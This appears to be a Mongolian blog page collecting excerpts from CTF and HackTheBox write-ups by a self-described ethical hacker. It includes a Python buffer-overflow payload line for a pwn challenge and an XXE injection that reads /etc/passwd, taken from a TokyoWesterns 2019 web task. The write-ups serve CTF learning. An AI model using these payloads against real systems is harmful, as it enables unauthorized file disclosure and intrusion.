Аливаа зүйл харагдаж байгаа шигээ амархан байдаггүй… Сайн байцгаана уу. Намайг Түмэнхүүгийн Ялгуун гэдэг. Найзууд маань Эфгоод (fg0d ) гэж дууддаг. Одоо 22 настай | Ёс зүйт хакер |.

HackTheBox бол дэлхийн хамгийн том , хакеруудын өрсөлдөөний платформ билээ. Миний бие энэхүү платформоор дамжуулж идэвхтэй мэдлэгээ ахиулаад 1 жил өнгөрсөн байна. Энэхүү нийтлэлээр та бүхэнд HackTheBox -н саяхан шинээр гаргасан боломжыг хэрхэн ашиглах талаар мэдээллийг хүргэнэ. Academy ( Академи )

Pwn CheckSec ebp-0xc in debugger import struct print 'A'*15 print 'A'*15 print 'A'*15 print 'A'*116 + struct.pack('<I', 0xc0d3d00d)

TokyoWesterns CTF 5th 2019 [ WEB , Forensics , Misc ] WEB Уг даалгавар нь JSON → XML , XML → JSON converter байсан бөгөөд үүнийг харахад миний зүгээс XML → JSON хэсгийг ашиглаж XXE буюу [ XML Externel Entity ] exploit -г хийх боломжтой байсан. Үүнийг туршиж үзэхийн тулд эхлээд энгийн injection -г хийж туршиж үзсэн. Injection: <?xml version=”1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM ‘file:///etc/passwd’>]><root>&test;</root>

[ Forensics ] Slow Realization ( 200 points ) Энэхүү Writeup нь зөвхөн анхлан суралцагчдад зориулагдсан бөгөөд цаашид CTF -н даалгавруудын зөвлөмжүүдийг идэвхтэй хүргэх болно. [FantasM ]

[ 944 points]

forensics , stegano